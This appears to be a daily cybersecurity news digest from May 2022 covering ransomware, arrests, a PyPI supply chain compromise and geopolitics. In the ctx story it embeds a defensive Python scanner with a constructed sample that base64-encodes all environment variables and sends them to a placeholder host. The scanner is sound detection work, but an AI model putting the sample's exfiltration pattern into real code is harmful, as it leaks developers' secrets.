Thursday, May 26, 2022 // (IG): BB //Weekly Sponsor: UNDERWORLD BJJ
New ‘Cheers’ Linux ransomware targets VMware ESXi servers
FROM THE MEDIA: A new ransomware named ‘Cheers’ has appeared in the cybercrime space and has started its operations by targeting vulnerable VMware ESXi servers. VMware ESXi is a virtualization platform commonly used by large organizations worldwide, so encrypting them typically causes severe disruption to a business’ operations.
We have seen many ransomware groups targeting the VMware ESXi platform in the past, with the most recent additions being LockBit and Hive. The addition of Cheers ransomware to the club was discovered by analysts at Trend Micro, who call the new variant ‘Cheerscrypt’.
READ THE STORY: Bleeping Computer
Sanctions Frustrating Russian Ransomware Actors
FROM THE MEDIA: Russia's invasion of Ukraine appears to be having an unanticipated impact in cyberspace — a decrease in the number of ransomware attacks. "We have seen a recent decline since the Ukrainian invasion," Rob Joyce, the U.S. National Security Agency's director of cybersecurity, told a virtual forum Wednesday.
Joyce said one reason for the decrease in ransomware attacks since the February 24 invasion is likely improved awareness and defensive measures by U.S. businesses. He also said some of it is tied to measures the United States and its Western allies have taken against Moscow in response to the war in Ukraine.
READ THE STORY: VOA
Interpol's Massive 'Operation Delilah' Nabs BEC Bigwig
FROM THE MEDIA: Business email compromise (BEC) attacks have caused billions of dollars in losses to businesses globally in recent years — but now international law-enforcement has notched up another victory in the battle against them.
Interpol on Wednesday announced that "Operation Delilah" has resulted in Nigerian police arresting the suspected head of SilverTerrier, aka TMT, a massive BEC operation that has been active since at least 2015, impacting thousands of businesses and individuals across four continents. The 37-year-old Nigerian man, whom Interpol did not name, was apprehended at Murtala Muhammed International Airport in Lagos as he attempted to re-enter the country, having fled ahead of police in 2021.
READ THE STORY: Darkreading
Geopolitical conflicts spill into cyberspace, state-backed threat actors target critical infrastructure: Akshat Jain, CTO & Co-founder, Cyware
FROM THE MEDIA: Geopolitical conflicts in the real world are now spilling into cyberspace as state-backed threat actors target critical infrastructure entities to cause disruption or for espionage purposes. Many public and private sector organizations are getting caught in the crossfire of such cyberwars, leading to loss of data, service outages, reputational damage, financial theft, and more. Nation-state actors come with immense technical skills and resources at their disposal, and they actively share attack vectors, malware, hacking tools, and their tactics, techniques, and procedures (TTPs) with other groups to make their attacks more effective. On the other hand, organizations are often left to defend alone against such capable adversaries. Therefore, security teams need to factor in the potential threats originating from nation-state actors and shape their strategies accordingly.
READ THE STORY: Express Computer
Widely used Python and PHP libraries compromised
FROM THE MEDIA: In a software supply chain attack, the PyPI module ctx has been compromised. A clean version of the module (downloaded about 20,000 times a week) was replaced with code that exfiltrates the developer's environment variables, harvesting secrets such as AWS access keys.
'ctx' is a minimal Python module that gives developers alternative ways to work with dictionary ('dict') objects. After going untouched for eight years, new versions began appearing on May 15 that contained the malicious code. PyPI soon removed the malicious ctx versions; however, reports indicated that every ctx version available on the index at the time carried the malicious code.
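As an added illustration (not code from the original story, from PyPI, or from the ctx project), here is a small static check for the pattern described above: a module that both reads the process environment and makes outbound network calls. Either behaviour alone is common; the two together in a tiny utility package are worth a look before you install it. The samples are constructed to mimic the reported behaviour and do not reproduce the actual malicious payload; the collector hostname is a placeholder on the reserved `.invalid` domain. The check generalises beyond the ctx case: it resolves import aliases, so `from urllib.request import urlopen` and `import requests as r` are both caught.

```python
"""Added example: heuristic scan of a Python source file for the combination
'reads environment variables' + 'calls into a network module'.
Illustrative code written for this digest, not the ctx package or its payload."""
import ast
from dataclasses import dataclass, field

# Top-level modules whose use indicates outbound network activity (assumed list).
NETWORK_MODULES = {"urllib", "requests", "socket", "http", "httpx"}
# Dotted names that read the process environment.
ENV_ACCESSORS = {"os.environ", "os.getenv"}
ENV_ATTRS = {name.split(".")[1] for name in ENV_ACCESSORS}


@dataclass
class Finding:
    env_reads: list = field(default_factory=list)      # (line, expression)
    network_calls: list = field(default_factory=list)  # (line, expression)

    def suspicious(self) -> bool:
        # Reading the environment alone is normal configuration code; reading it
        # and talking to the network in the same module is what we flag.
        return bool(self.env_reads) and bool(self.network_calls)


def _dotted(node: ast.AST):
    """Rebuild 'a.b.c' from an Attribute chain rooted at a Name, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source: str) -> Finding:
    tree = ast.parse(source)
    finding = Finding()
    net_names, env_names = set(), set()

    # Pass 1: which local names are bound to network modules or env accessors.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    net_names.add((alias.asname or alias.name).split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module:
            top = node.module.split(".")[0]
            for alias in node.names:
                bound = alias.asname or alias.name
                if top in NETWORK_MODULES:
                    net_names.add(bound)
                elif node.module == "os" and alias.name in ENV_ATTRS:
                    env_names.add(bound)

    # Pass 2: flag environment reads and calls that resolve to a network module.
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            dotted = _dotted(node)
            if dotted in ENV_ACCESSORS:
                finding.env_reads.append((node.lineno, dotted))
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Load):
            if node.id in env_names:
                finding.env_reads.append((node.lineno, node.id))
        elif isinstance(node, ast.Call):
            dotted = _dotted(node.func)
            if dotted and dotted.split(".")[0] in net_names:
                finding.network_calls.append((node.lineno, dotted))
    return finding


# Constructed samples. MALICIOUS_SAMPLE mirrors the described behaviour
# (serialise the whole environment and ship it out); it is not the real payload.
MALICIOUS_SAMPLE = '''
import os
import base64
from urllib.request import urlopen

class Ctx(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.send_request()

    def send_request(self):
        blob = base64.b64encode(str(dict(os.environ)).encode()).decode()
        urlopen("https://collector.invalid/?data=" + blob)
'''

CONFIG_SAMPLE = '''
import os
DEBUG = os.getenv("APP_DEBUG", "0") == "1"
'''

BENIGN_SAMPLE = '''
class Ctx(dict):
    """Attribute-style access to dict keys (constructed benign sample)."""
    def __getattr__(self, key):
        return self[key]
'''


def scan_samples() -> dict:
    """Scan the constructed samples; returns {name: suspicious?}."""
    samples = {"malicious": MALICIOUS_SAMPLE, "config": CONFIG_SAMPLE, "benign": BENIGN_SAMPLE}
    return {name: scan_source(src).suspicious() for name, src in samples.items()}


if __name__ == "__main__":
    for name, flagged in scan_samples().items():
        print(f"{name:10s} suspicious={flagged}")
```

Run it over every file of an unpacked sdist or wheel before trusting a new release of a dependency that has been dormant for years. Treat a hit as a prompt to read the code, not as proof of compromise, and pair the check with hash pinning (`pip install --require-hashes -r requirements.txt`) so that a silently re-uploaded version of an already-pinned release fails to install.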
READ THE STORY: Analytics India Mag
What We Know About the Vulnerabilities Keeping ‘Dark Souls’ Offline
FROM THE MEDIA: The maker of Dark Souls, a popular video games series, has shut down its servers for over 113 days due to CVE-2022-24126, a remote code execution (RCE) vulnerability that could allow a hacker to take over a user’s PC and put its active player base at risk.
On May 10, the game’s publisher, Bandai Namco, said that developers from FromSoftware, the Japanese firm that created the series, were “actively working on resolving the issue in question” and that servers would be running “as soon as possible.” As of this publishing, every game in the Dark Souls series (Dark Souls 3, Dark Souls 2, Dark Souls: Remastered, and Dark Souls: Prepare to Die Edition) remains offline.
In its statement, Bandai Namco did not address the specific issue they were fixing, nor did they mention two other active vulnerabilities—namely CVE-2022-24125 and CVE-2021-34170—that have been confirmed to be affecting those games in addition to CVE-2022-24126.
READ THE STORY: Security Boulevard
Russian hackers behind new Brexit leak website, says Google
FROM THE MEDIA: The website has published multiple emails that it claims were sent to and from key people in the Brexit process, including former MI6 chief Richard Dearlove, leading Brexit supporter Gisela Stuart, and pro-Brexit historian Richard Toombs. The website, 'Very English Coop [sic] d'Etat', claims that the hacked messages demonstrate that a group of hardline pro-Brexit figures is secretly controlling the UK.
It further claims a 'deep state' plot to replace Theresa May with Boris Johnson as Prime Minister. Two victims of the leak confirmed to Reuters that they had been targeted by hackers, and blamed the Russian government.
READ THE STORY: Computing
Chaos ransomware explained: A rapidly evolving threat
FROM THE MEDIA: The Chaos ransomware builder started out last year as a buggy and unconvincing impersonation of the notorious Ryuk ransomware kit. It has since gone through active development and rapid improvements that have convinced different attacker groups to adopt it. The latest version, dubbed Yashma, was first observed in the wild in mid-May and contains several enhancements.
One successful ransomware operation known as Onyx hit U.S.-based emergency services, medical facilities and organizations from several other industries over the past year. It uses a variation of the Chaos ransomware, according to security researchers.
READ THE STORY: CSO Online
Feds remain in the dark as ransomware disclosure lags
FROM THE MEDIA: Sen. Gary Peters in July 2021 launched an investigation into the role cryptocurrencies play in ransomware. The probe was announced after a series of devastating ransomware attacks on key industries, including the May 2021 attack on Colonial Pipeline, followed weeks later by a ransomware attack on meat supplier JBS USA and the July ransomware attack against IT management software firm Kaseya.
The attacks demonstrated the potential impacts of such malign activity on national security, giving rise to a series of Biden administration measures to crack down on ransomware.
The Department of Justice formed a task force last year to help coordinate investigations into criminal ransomware, leading to increased cooperation with international law enforcement partners. It also took additional measures to recover ransom payments, dismantle the infrastructure of criminal gangs, and shut down crypto transfer companies and money-laundering operations.
READ THE STORY: Cyber Security Dive
SpiceJet's brush with ransomware is a timely reminder to protect yourself against this cyber menace
FROM THE MEDIA: SpiceJet said on Wednesday that it had thwarted an attempted ransomware attack, one that nonetheless hobbled the airline's systems and delayed multiple flights by several hours. While the fallout was, at worst, frayed passenger tempers and tangled logistics, the incident has shifted the spotlight to the menace of ransomware attacks, which gained prominence in 2017.
READ THE STORY: CNBC TV 18
Chinese takeover of UK's largest microchip producer faces national security review
FROM THE MEDIA: The acquisition of the UK's biggest microchip factory, Newport Wafer Fab, by a Chinese-owned technology company is to undergo a national security assessment. The business secretary Kwasi Kwarteng announced the move after Nexperia, which is headquartered in the Netherlands but part of Shanghai-based Wingtech, completed the purchase in July last year for a reported £63m.
Mr Kwarteng wrote on his Twitter account: "There will now be a full assessment under the new National Security and Investment Act. "We welcome overseas investment, but it must not threaten Britain's national security."
READ THE STORY: Sky News
Defining the borders of data
FROM THE MEDIA: The New York Times takes a look at the evolving world of data privacy regulation. The data users share when on the web has gone relatively unregulated for years, and Big Tech has enjoyed the freedom of using that data as it sees fit. Now nations all over the world are attempting to rein in that unchecked power by establishing “digital sovereignty,” regulations that limit how, when, and why tech companies can access data originating within the country’s borders. But it’s a race against time, as the world becomes more digitized and the pile of available data continues to grow at an exponential rate.
Cloud computing further complicates matters, allowing a company in one country to store their data on a server in another. Federico Fabbrini, a professor of European law at Dublin City University, explains, “The amount of data has become so big over the last decade that it has created pressure to bring it under sovereign control.”
READ THE STORY: The Cyberwire
Head of DOD artificial intelligence command warns Pentagon must improve to beat China on AI
FROM THE MEDIA: The U.S. military’s top expert on artificial intelligence (AI) said Wednesday that the Pentagon must up its game to ensure American supremacy in a future era where artificial intelligence will determine success on the battlefield.
China aims to dominate the world in the AI space by 2030, the Pentagon’s Joint Artificial Intelligence Center director, Lt. Gen. Michael Groen, told an Atlantic Council-convened audience gathered for a discussion of AI in national security. Groen said that AI will be a $16 trillion industry by 2030 and will raise GDP significantly for both China and the U.S.
READ THE STORY: Cyberscoop
RansomHouse may be operated by frustrated bounty hunters.
FROM THE MEDIA: RansomHouse, a new extortion gang, skips the data encryption customary with conventional ransomware operators and extorts victims through data theft and the threat of doxing. Researchers at Cyberint who have been tracking the group note that it claims an elevated purpose.
RansomHouse objects to the way organizations don't devote enough resources to security, and hopes to shove them in the direction of better practices. RansomHouse also objects to what it views as a cheapskate tendency with respect to bug bounties, and this suggests to Cyberint that the members of the gang may be frustrated bounty hunters, white hats gone bad.
READ THE STORY: The Cyberwire
China to develop anti-Starlink satellite weapon to protect national security
FROM THE MEDIA: The Chinese military is planning to develop a weapon that can destroy Elon Musk’s Starlink satellites should the constellation threaten China's “national security”, media reports said. Starlink is a satellite constellation system operated by Musk’s SpaceX, and provides broadband internet services to commercial and military users around the globe. With more than 2,300 satellites in orbit, it is generally believed to be indestructible because the system can maintain proper functioning after losing some satellites.
READ THE STORY: Orissa Post
Verizon DBIR: Stolen credentials led to nearly 50% of attacks
FROM THE MEDIA: The Verizon 2022 Data Breach Investigations Report revealed that an alarming percentage of attacks last year were caused by threat actors using a very simple tool: stolen credentials.
While a rise in ransomware was the spotlight of the 15th annual report, enterprises also struggled with securing credentials and exposed web applications, as well as patching vulnerabilities and properly configuring security controls. Those common mistakes led to big consequences.
One commonality among the more than 20,000 security incidents and 5,212 confirmed data breaches was the use of stolen credentials, which accounted for nearly 50% of attacks and was present in third-party breaches, phishing attacks, basic web application attacks (BWAA) and system intrusions.
READ THE STORY: TechTarget
The Best Counter to Misinformation is More Information
FROM THE MEDIA: As war spread across Ukraine earlier this year, Russia and its allies were spinning tales and stretching the truth to support a clearly unlawful use of force. First it was a claim that Ukraine was committing genocide against ethnic Russians in contested regions. Next was a claim that neo-Nazis in Ukraine posed an immediate threat to Russia, offered as a pretext for an unlawful invasion; another false defense offered by the aggressors was that Ukraine was developing nuclear or biological weapons. Meanwhile, Russian censors went into overdrive back home, and the government even passed a law threatening anyone who calls the “Ukraine issue” a war with 15 years in prison. Information has now become a strategic weapon, even in conventional wars.
READ THE STORY: Small wars Journal
UN to vote in ‘coming days’ on North Korea sanctions
FROM THE MEDIA: The UN Security Council will vote in the “coming days” on a US-led push to strengthen sanctions on North Korea for its renewed ballistic missile launches, a US official said on Wednesday, although China and Russia have signaled opposition. North Korea fired three missiles on Wednesday, including one thought to be its largest intercontinental ballistic missile, after US President Joe Biden ended a trip to Asia. It was the latest in a string of missile launches by North Korea this year.
The United States began a push at the end of March on sanctions and then last month circulated a draft resolution to the 15-member body. A resolution needs nine “yes” votes and no vetoes by Russia, China, France, Britain or the United States to pass.
READ THE STORY: SABC NEWS
Kiev condemns Russia's fast-track passport issuance decree for Ukrainian citizens
FROM THE MEDIA: The Ukrainian Foreign Ministry has condemned the decree signed by Russian President Vladimir Putin, which allows residents of Ukraine's southern Zaporizhzhia and Kherson regions to apply for Russian citizenship under a fast-track procedure. "The decree of the President of Russia is legally null and void and will have no legal consequences," the ministry was quoted by Xinhua news agency as saying.
The issuance of Russian passports to Ukrainian citizens living in the territories seized by Russia is a "gross violation of Ukraine's sovereignty and territorial integrity, norms and principles of international humanitarian law," it said. Putin signed the decree on the simplified passport issuance procedure for the residents of the Zaporizhzhia and Kherson regions earlier in the day.
READ THE STORY: National Herald India
NATO Deputy Secretary General opens “Defense Disrupted” innovation and technology conference
FROM THE MEDIA: Deputy Secretary General Mircea Geoană opened the “Defence Disrupted 2022” conference on Thursday (26 May 2022), stressing the importance of maintaining NATO’s technological edge, and remaining at the forefront of defence innovation. In a video address to participants gathered in London, he reflected on how innovation and technology have always been central to NATO’s mission of preventing war.
READ THE STORY: NATO
Items of interest
Cyber Threats to Health, Education Sectors Increase with Ransomware, Limited Security Resources
FROM THE MEDIA: The healthcare sector and supporting critical infrastructure sectors “can no longer look at the challenges through just a cyber and/or physical lens but must consider all threats to operational resilience,” while the education sector suffers from equity issues reflected in reduced cyber protection capabilities in under-funded K-12 districts and colleges, experts told lawmakers.
“With the rise in digital health care, the proliferation of advances in technology and the efficiencies of connecting devices and data, the cyber threat surface in health care has ballooned and the threat actors have followed,” Health Information Sharing and Analysis Center (H-ISAC) President and CEO Denise Anderson, also representing the Health Sector Coordinating Council Cybersecurity Working Group, said at the hearing of the Senate Health, Education, Labor and Pensions Committee on May 18 to examine cyber threats to the healthcare and education sectors. “The focus has traditionally been on data and privacy, but if providers cannot deliver services or data is manipulated or destroyed patient lives can be at risk.”
READ THE STORY: HSTODAY
Cyber Crime Isn't About Computers: It's About Behavior (Video)
FROM THE MEDIA: Having a computer hacked can be life altering! We are often fearful of hackers and those who want to engage in identity theft. Well, this ex-NSA agent and IT specialist will explain how hacking can be prevented!
Brett Johnson: US Most Wanted Cybercriminal (Video)
FROM THE MEDIA: Brett Johnson was a US Most Wanted cybercriminal, called the Original Internet Godfather by US Secret Service for building the first organized cybercrime community called ShadowCrew, which was the precursor to today's darknet and darknet markets.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com